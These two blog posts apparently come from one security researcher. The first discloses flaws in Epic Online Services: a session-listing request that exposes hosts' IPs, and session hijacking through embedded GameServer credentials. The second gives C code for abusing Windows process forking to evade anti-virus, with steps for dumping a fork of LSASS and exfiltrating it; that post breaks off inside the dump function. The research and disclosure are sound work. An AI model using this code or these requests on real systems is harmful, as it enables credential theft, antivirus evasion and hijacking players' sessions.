In the first request to Epic Games' API servers, there are a few interesting headers that indicate what service this could be in connection to. Specifically the User-Agent and Miscellaneous headers referred to something called "EOS". A quick Google search revealed that this stood for Epic Online Services!

Discovery

Epic Online Services is intended to assist game developers in creating multiplayer-compatible games by offering a platform that supports many common multiplayer features. Whether it be matchmaking, lobbies, peer-to-peer functionality, or more, there are many attractive features the service offers to game developers.

Before we continue with any security review, it's important to have a basic conceptual understanding of the product you're reviewing. This context can be especially helpful in later stages when trying to understand the inner workings of the product.

First, let's take a look at how you authenticate with the Epic Online Services API (EOS-API). According to documentation, the EOS Client uses OAuth Client Credentials to authenticate with the EOS-API. Assuming you have already set up a project in the EOS Developer Portal, you can generate credentials for either the GameServer or GameClient role, which are expected to be hardcoded into the server/client binary:

The EOS SDK requires a program to provide valid Client Credentials, including a Client ID and Client Secret. This information is passed in the EOS_Platform_ClientCredentials structure, which is a parameter in the function EOS_Platform_Create. This enables the SDK to recognize the program as a valid EOS Client, authorize the Client with EOS, and grant access to the features enabled in the corresponding Client Role.

I found it peculiar that the only "client roles" that existed were GameServer and GameClient. The GameClient role "can access EOS information, but typically can't modify it", whereas the GameServer role "is a server or secure backend intended for administrative purposes". If you're writing a peer-to-peer game, what role do you give clients?

GameClient credentials won't work for hosting sessions, given that they're meant for read-only access, but GameServer credentials are only meant for "a server or secure backend". A peer-to-peer client is neither a server nor anything I'd call "secure", yet Epic Games effectively forces developers to embed GameServer credentials, because otherwise how could peer-to-peer clients host sessions?

The real danger here is that the documentation falsely assumes that a client with the GameServer role can be trusted, when in fact that client may be an untrusted P2P client. I was amused that Epic Games even gives an example of the problem with giving untrusted clients the GameServer role:

The Client is a server or secure backend intended for administrative purposes. This type of Client can directly modify information on the EOS backend. For example, an EOS Client with a role of GameServer could unlock Achievements for a player.

Going back to those requests we intercepted earlier, the client credentials are pretty easy to extract.

[Screenshot: authentication request with the Base64 Authorization header]

In the authentication request above, the client credentials are simply embedded as a Base64-encoded string in the Authorization header. Decoding this string yields a username:password combination representing the client credentials. With so little effort, we are able to obtain credentials for the GameServer role, giving significant access to the backend used for Satisfactory. We'll take a look at what we can do with GameServer credentials in a later section.

Since we're interested in peer-to-peer sessions/matchmaking, the next place to look is the "Sessions interface", which "gives players the ability to host, find, and interact with online gaming sessions". The Sessions interface is obtained through the Platform interface function EOS_Platform_GetSessionsInterface. The high-value targets here are session creation, session discovery, and joining a session; problems in these processes could have significant security impact.

Discovery: Session Creation

The first process to look at is session creation. Creating a session with the Sessions interface is relatively simple.

First, you create an EOS_Sessions_CreateSessionModificationOptions structure that contains the following information:

[Screenshot: EOS_Sessions_CreateSessionModificationOptions fields]

Then you pass this structure to the EOS_Sessions_CreateSessionModification function to create the session. Although this function creates your session, there is a significant amount more you can configure, given that the initial structure contains only the information required to create a barebones session.

Discovery: Finding Sessions

For example, let's talk about how matchmaking works with these sessions. A major component of Sessions is the ability to add "custom attributes":

Sessions can contain user-defined data, called attributes. Each attribute has a name, which acts as a string key, a value, an enumerated variable identifying the value's type, and a visibility setting.

These "attributes" are what allows developers to add custom information about a session, such as the map the session is for or what version the host is running at.

EOS makes session searching simple. Similar to session creation, to create a barebones "session search", you simply call EOS_Sessions_CreateSessionSearch with an EOS_Sessions_CreateSessionSearchOptions structure. This structure has the minimum amount of information needed to perform a search, containing only the maximum number of search results to return.

Before performing a search, you can update the session search object to filter for specific properties. EOS allows you to search for sessions based on:

  • A known unique session identifier (at least 16 characters in length).
  • A known unique user identifier.
  • Session Attributes.

Although you can use a session identifier or a user identifier if you're joining a known specific session, for matchmaking purposes, attributes are the only way to "discover" sessions based on user-defined data.

Discovery: Sensitive Information Disclosure

Satisfactory isn't a matchmaking game, so you'd assume it would use the unique session identifier provided by the EOS-API. Unfortunately, until a month ago, EOS did not allow you to set a custom session identifier; instead, game developers were forced to use EOS's randomly generated 32-character session ID.

When hosting a session in Satisfactory, hosts are given the option to set a custom session identifier. When joining a multiplayer session, besides joining via a friend, Satisfactory gives the option of using this session identifier to join sessions. How does this work in the background?

Although the EOS-API assigns a random session identifier to every newly created session, many implementations ignore it and instead use attributes to store their own session identifier. Honestly, who wants to share a random 32-character string with friends?

I decided the best way to figure out how Satisfactory handled unique session identifiers was to see what happens on the network when I attempt to join a custom session ID.


Here is the request performed when I attempted to join a session with the identifier "test123":

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [
    {
      "key": "attributes.NUMPUBLICCONNECTIONS_l",
      "op": "GREATER_THAN_OR_EQUAL",
      "value": 1
    },
    {
      "key": "bucket",
      "op": "EQUAL",
      "value": "Satisfactory_1.0.0"
    },
    {
      "key": "attributes.FOSS=SES_CSS_SESSIONID_s",
      "op": "EQUAL",
      "value": "test123"
    }
  ],
  "maxResults": 2
}

Of course, this returned no valid sessions, but the request revealed that the mechanism used for finding sessions is based on a set of criteria. I was curious: how much flexibility does the EOS-API give the client when it comes to these criteria?

Exploitation: Sensitive Information Disclosure

The first idea I had when I saw that filtering was based on an array of "criteria" was: what happens when you specify no criteria at all? To my surprise, the EOS-API was quite accommodating:
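
The request is the same shape as the earlier capture, just with an empty criteria array (the maxResults value here is illustrative):

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [],
  "maxResults": 200
}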

[Screenshot: response listing public sessions with host IP addresses]

Although sessions in Satisfactory are advertised as "Friends-Only", I was able to enumerate all sessions that weren't set to "Private". Along with each session, I was given the IP address of the host and their user identifier. On a large scale, an attacker could easily use this information to create a map of most players.

To be clear, this isn't just a Satisfactory issue. You can enumerate the sessions of any game you have at least GameClient credentials for. Obviously, in a peer-to-peer model other players can potentially learn your IP address, but the problem here is that it is trivial to enumerate the thousands of active sessions, given that besides the initial authentication there are literally no access controls (not even rate-limiting). Furthermore, to connect to another client through the EOS-API, you don't even need the host's IP address!

Discovery: Session Hijacking

Going back to what we're really interested in, the peer-to-peer functionality of EOS, I was curious to learn what connecting to other clients actually looks like and what problems might exist with its design. Reading the "Sending and Receiving Data Through P2P Connections" section of the NAT P2P Interface documentation reveals that to connect to another player, we need their:

  1. Product user ID - This "identifies player data for an EOS user within the scope of a single product".
  2. Optional socket ID - This is a unique identifier for the specific socket to connect to. In common implementations of EOS, this is typically the randomly generated 32 character "session identifier".

Now that we know what data we need, the next step is understanding how the game itself shares these details between players.

One of the key features of the EOS Matchmaking/Session API we took a look at in a previous section is the existence of "Attributes", described by documentation to be a critical part of session discovery:

The most robust way to find sessions is to search based on a set of search parameters, which act as filters. Some parameters could be exposed to the user, such as enabling the user to select a certain game type or map, while others might be hidden, such as using the player's estimated skill level to find matches with appropriate opponents.

For peer-to-peer sessions, attributes are even more important, because they are the only way of carrying information about a session to other players. For a player to join another's peer-to-peer session, they need to retrieve the host's product user ID and an optional socket ID. Most implementations of Epic Online Services store this product user ID in the session's attributes. Of course, only clients with the GameServer role are allowed to create sessions and/or modify their attributes.

Exploitation: Session Hijacking

Recalling the first section, the core vulnerability and fundamental design flaw in EOS is that P2P games are required to embed GameServer credentials into their application. This means that, theoretically speaking, an attacker can create a fake session with any attribute values they'd like. This got me thinking: if attributes are the primary way clients find sessions to join, then with GameServer credentials we can effectively "duplicate" existing sessions and potentially hijack the session clients find when searching for the original.

Sound confusing? It is! Let's talk through a real-world example.

One widely used implementation of Epic Online Services is the "OnlineSubsystemEOS" (EOS-OSS) plugin included with the Unreal Engine, a popular implementation used by games such as Satisfactory.

In Satisfactory's use of EOS-OSS, an attribute named SES_CSS_SESSIONID is used to track sessions. For example, if a player wanted their friend to join directly, they could give their friend a session ID from their client, which the friend would be able to use to join. When the session ID search is executed, all that's happening is a filter query against all sessions for that session ID attribute value. Once the session has been found, EOS-OSS joins it by retrieving the host's product user ID through another session attribute named OWNINGPRODUCTID.

Since Satisfactory is a peer-to-peer game exclusively using the Epic Online Services API, an attacker can use the credentials embedded in the binary to gain access to the GameServer role. With a GameServer token, an attacker can hijack existing sessions by creating several "duplicate" sessions that have the same session ID attribute but have the OWNINGPRODUCTID attribute set to the attacker's own product user ID.

When a victim searches for a session with the right session ID, more likely than not the query will return one of the duplicated sessions carrying the attacker's product user ID (the ordering of sessions is random). Thus, when the victim attempts to join the game, they will join the attacker's game instead!

This attack is far more severe than it may seem, because it is trivial to script it to hijack all sessions at once, causing every player joining any session to join the attacker's session instead. To summarize, this fundamental design flaw allows attackers to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".

Remediation

When it comes to communication, Epic Games was one of the best vendors I have ever worked with. They consistently responded promptly, showed a high level of respect for my time, and were willing to extensively discuss the vulnerability. I can confidently say that the security team there is very competent and I have no doubt of their skill. When it comes to actually "getting things done" and fixing these vulnerabilities, however, the response was questionable.

To my knowledge:

  1. Epic Games has partially* remediated the sensitive information disclosure vulnerability, opting to use a custom addressing format for peer-to-peer hosts instead of exposing their real IP Address in the ADDRESS session attribute.
  2. Epic Games has not remediated the session hijacking issue; however, they have released a new "Client Policy" mechanism, including a Peer2Peer policy intended for "untrusted client applications that want to host multiplayer matches". In practice, the only impact on the vulnerability is an extra layer of authentication: the attacker must be a user of the game (in contrast to only needing client credentials). Epic Games has noted that they plan to "release additional tools to developers in future updates to the SDK, allowing them to further secure their products".

* If a new session does not set its own ADDRESS attribute, the EOS-API will automatically set their public IP Address as the ADDRESS attribute.

Instead of fixing the severe design flaw, Epic Games opted to update their documentation with several warnings about how to use EOS correctly and to add trivial obstacles for an attacker (i.e. the user authentication required for session hijacking). Regardless of these warnings, the vulnerability is still in full effect. Here is a list of the various notices Epic Games has placed in their documentation:

  1. In the documentation for the Session interface, Epic Games has placed several warnings all stating that attackers can leak the IP Address of a peer-to-peer host or server.
  2. Epic Games has created a brand new Matchmaking Security page, a sub-page of the Session interface, outlining:
  • Attackers may be able to access the IP Address and product user ID of a session host.
  • Attackers may be able to access any custom attributes set by game developers for a session.
  • Some "best practices", such as only exposing information you need to expose.
  3. Epic Games has transitioned to a new Client Policy model for authentication, including policies for untrusted clients.

Can this really be fixed?

I'd like to give Epic Games every chance to explain themselves with these questionable remediation choices. Here is the statement they made after reviewing this article.

Regarding P2P matchmaking, the issues you’ve outlined are faced by nearly all service providers in the gaming industry - at its core P2P is inherently insecure. The EOS matchmaking implementation follows industry standard practices. It's ultimately up to developers to implement appropriate checks to best suit their product. As previously mentioned, we are always working to improve the security around our P2P policy and all of our other matchmaking policies.

Unfortunately, I have a lot of problems with this statement:

  1. Epic Games erroneously included the IP Address of peers in the session attributes, even though this information was never required in the first place. Exposing PII unnecessarily is certainly not an industry standard. At the end of the day, an attacker can likely figure out the IP of a client if they have their product user ID and socket ID, but Epic Games made it trivial for an attacker to enumerate and map an entire game's matchmaking system by including that unnecessary info.
  2. "The EOS matchmaking implementation follows industry standard practices": The only access control present is a single layer of authentication...
  3. Epic Games has yet to implement common mitigations such as rate-limiting.
  4. There are an insane number of ways to insecurely implement Epic Online Services and Epic Games has documented none of these cases or how to defend against them. A great example is when games like Satisfactory store sensitive information like a session ID in the session's attributes.
  5. The claim that the Session Hijacking issue cannot be remediated because "P2P is inherently insecure" is simply not true. It's not as if you can't trust the central EOS-API server. Here is what Epic could do to remediate the Session Hijacking vulnerability:
  • A key requirement of the session hijacking attack is that an attacker must create multiple duplicate sessions matching the given attributes. An effective remediation is to limit the number of concurrent sessions a single user can have at once.
  • To prevent attackers from using multiple accounts to hijack a single session, Epic Games could enforce that the product user ID stored in the session matches the product user ID of the token the client authenticates with.
  • To be clear, if Epic Games applied my suggested path of remediation, an attacker could still buy 10-20 copies of the game on different accounts to perform the attack on a small-scale. A large-scale attack would require thousands of copies to create enough fake hijacking sessions.
  • The point with this path of remediation is that it would significantly reduce the exploitability of this vulnerability, much more than a single layer of authentication provides.

Epic Games has yet to comment on these suggestions.

But... why?

When I first came across the design flaw that peer-to-peer games are required to embed GameServer credentials, I was curious how such a fundamental flaw could have gotten past the initial design stage and decided to investigate.

After comparing the EOS landing page from its initial release in 2019 to the current page, it turns out that peer-to-peer functionality was not in the original release of Epic Online Services, but the GameClient and GameServer authentication model was!

It appears as though Epic Games simply didn't consider adding a new role dedicated to peer-to-peer hosts when designing the peer-to-peer functionality of the EOS-API.

Timeline

The timeline for this vulnerability is the following:

07/23/2020 - The vulnerability is reported to Epic Games.
07/28/2020 - The vulnerability is reproduced by HackerOne's triage team.
08/11/2020 - The vulnerability is officially triaged by Epic Games.
08/20/2020 - A disclosure timeline of 135 days is negotiated (for release in December 2020).
11/08/2020 - New impact/attack scenarios that are a result of this vulnerability are shared with Epic Games.
12/02/2020 - The vulnerability severity is escalated to Critical.
12/03/2020 - This publication is shared with Epic Games for review.
12/17/2020 - This publication is released to the public.

Frequently Asked Questions

Am I vulnerable?
If your game uses Epic Online Services, specifically its peer-to-peer or session/matchmaking functionality, you are likely vulnerable to some of the issues discussed in this article.

Epic Games has not remediated several issues discussed; opting to provide warnings in documentation instead of fixing the underlying problems in their platform.

What do I do if I am vulnerable?
If you're a player of the game, reach out to the game developers.

If you're a game or library developer, reach out to Epic Games for assistance. Make sure to review the documentation warnings Epic Games has added due to this vulnerability.

What is the potential impact of these vulnerabilities?
The vulnerabilities discussed in this article could be used to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".
  3. Leak the user identifier and IP Address of any player hosting a session.

Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

26 November 2021 at 04:32

Note: Another researcher recently tweeted about the technique discussed in this blog post; this is addressed in the last section of the blog (warning, spoilers!).

To access information about a running process, developers generally have to open a handle to the process through the OpenProcess API, specifying a combination of 13 different process access rights:

  1. PROCESS_ALL_ACCESS - All possible access rights for a process.
  2. PROCESS_CREATE_PROCESS - Required to create a process.
  3. PROCESS_CREATE_THREAD - Required to create a thread.
  4. PROCESS_DUP_HANDLE - Required to duplicate a handle using DuplicateHandle.
  5. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  6. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  7. PROCESS_SET_INFORMATION - Required to set certain information about a process such as its priority.
  8. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  9. PROCESS_SUSPEND_RESUME - Required to suspend or resume a process.
  10. PROCESS_TERMINATE - Required to terminate a process using TerminateProcess.
  11. PROCESS_VM_OPERATION - Required to perform an operation on the address space of a process (VirtualProtectEx, WriteProcessMemory).
  12. PROCESS_VM_READ - Required to read memory in a process using ReadProcessMemory.
  13. PROCESS_VM_WRITE - Required to write memory in a process using WriteProcessMemory.

The access rights requested will impact whether or not a handle to the process is returned. For example, a normal process running under a standard user can open a SYSTEM process for querying basic information, but it cannot open that process with a privileged access right such as PROCESS_VM_READ.
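To illustrate, here is a minimal sketch of that behavior; systemPid is a placeholder for the PID of a SYSTEM process (such as lsass.exe) that the caller has already looked up:

#include <windows.h>

// systemPid: hypothetical PID of a SYSTEM process.
// A limited query right is typically granted even to a standard user:
HANDLE hQuery = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, systemPid);

// ...whereas a privileged right such as PROCESS_VM_READ is typically denied;
// OpenProcess returns NULL and GetLastError() reports ERROR_ACCESS_DENIED.
HANDLE hRead = OpenProcess(PROCESS_VM_READ, FALSE, systemPid);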

In the real world, the importance of process access rights can be seen in the restrictions anti-virus and anti-cheat products place on certain processes. An anti-virus might register a process handle create callback to prevent processes from opening the Local Security Authority Subsystem Service (LSASS) which could contain sensitive credentials in its memory. An anti-cheat might prevent processes from opening the game they are protecting, because cheaters can access key regions of the game memory to gain an unfair advantage.

When you look at the thirteen process access rights, do any of them stand out as potentially malicious? I investigated that question by taking a look at the drivers for several anti-virus products. Specifically, what access rights did they filter for in their process handle create callbacks? I came up with this subset of access rights that were often directly associated with potentially malicious operations: PROCESS_ALL_ACCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_SET_INFORMATION, PROCESS_SUSPEND_RESUME, PROCESS_TERMINATE, PROCESS_VM_OPERATION, PROCESS_VM_READ, and PROCESS_VM_WRITE.

This leaves four other access rights that these products largely ignored:

  1. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  2. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  3. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  4. PROCESS_CREATE_PROCESS - Required to create a process.

These access rights were particularly interesting because if we could find a way to abuse any of them, we could potentially evade the detection of a majority of anti-virus products.

Most of these remaining rights cannot modify important aspects of a process. PROCESS_QUERY_INFORMATION and PROCESS_QUERY_LIMITED_INFORMATION are purely for reading informational details about a process. PROCESS_SET_QUOTA does impact the process, but does not provide much surface to abuse. For example, being able to set a process's performance limits is of limited usefulness in an attack.

What about PROCESS_CREATE_PROCESS? This access right allows a caller to "create a process" using the process handle, but what does that mean?

In practice, someone with a process handle containing this access right can create processes on behalf of that process. In the following sections, we will explore existing techniques that abuse this access right and its undiscovered potential.

Parent Process Spoofing

An existing evasion technique called "parent process ID spoofing" is used when a malicious application would like to create a child process under a different process. This allows an attacker to create a process while having it appear as if it was launched by another legitimate application.

At a high level, common implementations of parent process ID spoofing will (a minimal sketch follows the list):

  1. Call InitializeProcThreadAttributeList to initialize an attribute list for the child process.
  2. Use OpenProcess to obtain a PROCESS_CREATE_PROCESS handle to the fake parent process.
  3. Update the previously initialized attribute list with the parent process handle using UpdateProcThreadAttribute.
  4. Create the child process with CreateProcess, passing extended startup information containing the process attributes.
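
Below is a minimal sketch of those four steps. It is illustrative rather than authoritative: SpawnWithSpoofedParent, parentPid, and commandLine are hypothetical names, and error handling is abbreviated.

#include <windows.h>

// Hypothetical helper: launch commandLine as an apparent child of parentPid.
BOOL SpawnWithSpoofedParent(DWORD parentPid, LPWSTR commandLine)
{
    STARTUPINFOEXW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    SIZE_T attrSize = 0;
    BOOL ok = FALSE;

    // Step 2: obtain a PROCESS_CREATE_PROCESS handle to the fake parent.
    HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, parentPid);
    if (hParent == NULL)
        return FALSE;

    // Step 1: size and initialize an attribute list holding one attribute.
    InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
    si.lpAttributeList =
        (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);

    if (si.lpAttributeList != NULL &&
        InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize) &&
        // Step 3: store the parent process handle in the attribute list.
        UpdateProcThreadAttribute(si.lpAttributeList, 0,
                                  PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                  &hParent, sizeof(hParent), NULL, NULL))
    {
        // Step 4: create the child with the extended startup information.
        si.StartupInfo.cb = sizeof(si);
        ok = CreateProcessW(NULL, commandLine, NULL, NULL,
                            FALSE, // TRUE also inherits the parent's handles
                            EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                            (LPSTARTUPINFOW)&si, &pi);
    }

    if (si.lpAttributeList != NULL)
        DeleteProcThreadAttributeList(si.lpAttributeList);
    CloseHandle(hParent);
    return ok;
}

The InheritHandles argument (the FALSE above) is what the next paragraphs build on: passing TRUE hands the fake parent's inheritable handles to the attacker-controlled child.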

This technique is useful for more than just spoofing the parent of a child process. It can be used to attack the parent process itself as well.

When creating a process, if the attacker specifies TRUE for the InheritHandles argument, all inheritable handles present in the parent process will be given to the child. For example, if a process has an inheritable thread handle and an attacker would like to obtain this handle indirectly, the attacker can abuse parent process spoofing to create their own malicious child process which inherits these handles.

The malicious child process would then be able to abuse these inherited handles in an attack against the parent process, such as a child queuing asynchronous procedure calls (APCs) on the parent's thread handle. Although this variation of the technique does require that the parent have critical handles marked inheritable, several common applications, such as Firefox and Chrome, have inheritable thread handles.

Ways to Create Processes

The previous section explored one existing attack that used the high-level kernel32.dll function CreateProcess, but this is not the only way to create a process. Kernel32 provides abstractions such as CreateProcess that allow developers to avoid having to use ntdll functions directly.

Under the hood, kernel32 uses these ntdll functions and does much of the heavy lifting required to perform the NtXx calls. CreateProcess uses NtCreateUserProcess, which has the following function prototype:

NTSTATUS NTAPI
NtCreateUserProcess (
    PHANDLE ProcessHandle,
    PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess,
    ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags,
    ULONG ThreadFlags,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PPROCESS_CREATE_INFO CreateInfo,
    PPROCESS_ATTRIBUTE_LIST AttributeList
    );

NtCreateUserProcess is not the only low-level function exposed to create processes. There are two legacy alternatives: NtCreateProcess and NtCreateProcessEx. Their function prototypes are:

NTSTATUS NTAPI
NtCreateProcess (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    BOOLEAN InheritObjectTable,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort
    );

NTSTATUS NTAPI
NtCreateProcessEx (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob
    );

NtCreateProcess and NtCreateProcessEx are quite similar but offer a different route of process creation when compared to NtCreateUserProcess.

Forking Your Own Process

A lesser-documented capability available to developers is the ability to fork processes on Windows. The undocumented function developers can use to fork their own process is RtlCloneUserProcess. This function does not directly call the kernel and is instead a wrapper around NtCreateUserProcess.

A minimal implementation of forking through NtCreateUserProcess can be achieved trivially. By calling NtCreateUserProcess with NULL for both object attribute arguments, NULL for the process parameters, an empty (but not NULL) create info argument, and a NULL attribute list, a fork of the current process will be created, as sketched below.
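
Here is a hedged sketch of that minimal fork, assuming the open-source phnt headers (from the Process Hacker project) for the undocumented PS_CREATE_INFO definition and the NtCreateUserProcess prototype, and linking against ntdll; ForkSelf is a hypothetical name:

#include <phnt_windows.h>
#include <phnt.h>

// Hypothetical helper: fork the current process and return a handle to the
// child (in the parent), or NULL on failure.
HANDLE ForkSelf(void)
{
    // An "empty" create info: zeroed, with only its Size field populated.
    PS_CREATE_INFO createInfo = { 0 };
    createInfo.Size = sizeof(createInfo);

    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    NTSTATUS status = NtCreateUserProcess(
        &hProcess, &hThread,
        PROCESS_ALL_ACCESS, THREAD_ALL_ACCESS,
        NULL, NULL,   // no process/thread object attributes
        0, 0,         // no process/thread flags
        NULL,         // no process parameters
        &createInfo,  // empty (but not NULL) create info
        NULL);        // no attribute list

    return NT_SUCCESS(status) ? hProcess : NULL;
}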

One question that arose when performing this research was: what is the difference between forking a process and creating a new process with handles inherited? Interestingly, the minimal forking mechanism present in Windows includes not only inheritable handles but private memory regions too. Any dynamically allocated pages in the parent will be accessible at the same location in the child as well.

Both RtlCloneUserProcess and the minimal implementation described are publicly known techniques for simulating fork on Windows, but is there any use forking provides to an attacker?

In 2019, Microsoft Research Labs published a paper named "A fork() in the road", which discussed how what used to be a "clever hack" has "long outlived its usefulness and is now a liability". The paper discusses several areas, such as how fork is a "terrible abstraction" and how it compromises OS implementations. The section titled "FORK IN THE MODERN ERA" is particularly relevant:

Fork is insecure. By default, a forked child inherits everything from its parent, and the programmer is responsible for explicitly removing state that the child does not need by: closing file descriptors (or marking them as close-on-exec), scrubbing secrets from memory, isolating namespaces using unshare() [52], etc. From a security perspective, the inherit by-default behaviour of fork violates the principle of least privilege.

This section covers the security risk that is posed by the ability to fork processes. Microsoft provides the example that a forked process "inherits everything from its parent" and that "the programmer is responsible for explicitly removing state that the child does not need". What happens when the programmer is a malicious attacker?

Forking a Remote Process

I propose a new method of abusing the limited fork functionality present in Windows. Instead of forking your own process, what if you forked a remote process? If an attacker could fork a remote process, they would be able to gain insight into the target process without needing a sensitive process access right such as PROCESS_VM_READ, which could be monitored by anti-virus.

With only a PROCESS_CREATE_PROCESS handle, an attacker can fork or "duplicate" a process and access any secrets that are present in it. When using the legacy NtCreateProcess(Ex) variant, forking a remote process is relatively simple.

By passing NULL for the SectionHandle argument and a PROCESS_CREATE_PROCESS handle to the target as the ParentProcess argument, a fork of the remote process will be created and the attacker will receive a handle to the forked process (see the sketch below). Additionally, as long as the attacker does not create any threads, no process creation callbacks will fire. This means that an attacker could read the sensitive memory of the target and anti-virus wouldn't even know that the child process had been created.
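
The following is a minimal sketch of this remote fork, resolving NtCreateProcessEx dynamically since it is not exposed in the SDK headers; ForkRemoteProcess and targetPid are hypothetical names:

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtCreateProcessEx_t)(
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob);

// Hypothetical helper: fork the process identified by targetPid and return a
// handle to the forked child, or NULL on failure.
HANDLE ForkRemoteProcess(DWORD targetPid)
{
    NtCreateProcessEx_t pNtCreateProcessEx =
        (NtCreateProcessEx_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),
                                            "NtCreateProcessEx");

    // The only access right requested on the target is PROCESS_CREATE_PROCESS.
    HANDLE hTarget = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, targetPid);
    HANDLE hFork = NULL;

    if (pNtCreateProcessEx != NULL && hTarget != NULL)
    {
        // NULL SectionHandle plus the target as ParentProcess yields a fork.
        NTSTATUS status = pNtCreateProcessEx(&hFork, PROCESS_ALL_ACCESS, NULL,
                                             hTarget, 0, NULL, NULL, NULL,
                                             FALSE);
        if (status < 0) // !NT_SUCCESS
            hFork = NULL;
    }

    if (hTarget != NULL)
        CloseHandle(hTarget);
    return hFork; // the fork's memory can now be read with ReadProcessMemory
}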

When using the modern NtCreateUserProcess variant, all an attacker needs to do is reuse the earlier minimal self-fork implementation but pass the target process handle as a PsAttributeParentProcess entry in the attribute list, as sketched below.
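
A hedged sketch of that variant, again assuming the phnt headers for the undocumented PS_ATTRIBUTE definitions; hTarget stands for a PROCESS_CREATE_PROCESS handle to the victim:

#include <phnt_windows.h>
#include <phnt.h>

// hTarget: PROCESS_CREATE_PROCESS handle to the target process (assumed).
PS_CREATE_INFO createInfo = { 0 };
createInfo.Size = sizeof(createInfo);

// Single-entry attribute list marking the target as the "parent" to fork from.
PS_ATTRIBUTE_LIST attributeList = { 0 };
attributeList.TotalLength = sizeof(attributeList);
attributeList.Attributes[0].Attribute = PS_ATTRIBUTE_PARENT_PROCESS;
attributeList.Attributes[0].Size = sizeof(HANDLE);
attributeList.Attributes[0].ValuePtr = hTarget;

HANDLE hFork = NULL;
HANDLE hThread = NULL;
NTSTATUS status = NtCreateUserProcess(
    &hFork, &hThread,
    PROCESS_ALL_ACCESS, THREAD_ALL_ACCESS,
    NULL, NULL, 0, 0, NULL,
    &createInfo, &attributeList);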

With the child handle, an attacker could read sensitive memory from the target application for a variety of purposes. In the following sections, we'll cover approaches to detection and an example of how an attacker could abuse this in a real attack.

Example: Anti-Virus Tampering

Some commercial anti-virus solutions may include self-integrity features designed to combat tampering and information disclosure. If an attacker could access the memory of the anti-virus process, it is possible that sensitive information about the system or the anti-virus itself could be abused.

With Process Forking, an attacker can gain access to both private memory and inheritable handles with only a PROCESS_CREATE_PROCESS handle to the victim process. A few examples of attacks include:

  1. An attacker could read the encryption keys that are used to communicate with a trusted anti-virus server to decrypt or potentially tamper with this line of communication. For example, an attacker could pose as a man-in-the-middle (MiTM) with these encryption keys to prevent the anti-virus client from communicating alerts or spoof server responses to further tamper with the client.
  2. An attacker could gain access to sensitive information about the system that was provided by the kernel. This information could include data from kernel callbacks that an attacker otherwise would not have access to from usermode.
  3. An attacker could gain access to any handle the anti-virus process holds that is marked as inheritable. For example, if the anti-virus protects certain files from being accessed, such as sensitive configuration files, an attacker may be able to inherit a handle opened by the anti-virus process itself to access that protected file.

Example: Credential Dumping

One obvious target for a stealthy memory reading technique such as this is the Local Security Authority Subsystem Service (LSASS). LSASS is often the target of attackers that wish to capture the credentials for the current machine.

In a typical attack, a malicious program such as Mimikatz directly interfaces with LSASS on the victim machine; however, a stealthier alternative has been to dump the memory of LSASS for processing on an attacker machine. This avoids putting a well-known malicious program such as Mimikatz in the victim environment, where it is much more likely to be detected.

With Process Forking, an attacker can evade defensive solutions that monitor or prevent access to the LSASS process by dumping the memory of an LSASS fork instead (a sketch follows these steps):

  1. Set debug privileges for your current process if you are not already running as SYSTEM.
  2. Open a file to write the memory dump to.
  3. Create a fork child of LSASS.
  4. Use the common MiniDumpWriteDump API on the forked child.
  5. Exfiltrate the dump file to an attacker machine for further processing.
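
Steps 2-4 could look something like the hedged sketch below, which reuses the hypothetical ForkRemoteProcess helper from earlier; DumpLsassFork, lsassPid, and dumpPath are illustrative names:

#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")

// Hypothetical helper: dump a fork of LSASS (identified by lsassPid) to
// dumpPath for offline processing.
BOOL DumpLsassFork(DWORD lsassPid, LPCWSTR dumpPath)
{
    // Step 2: open a file to write the memory dump to.
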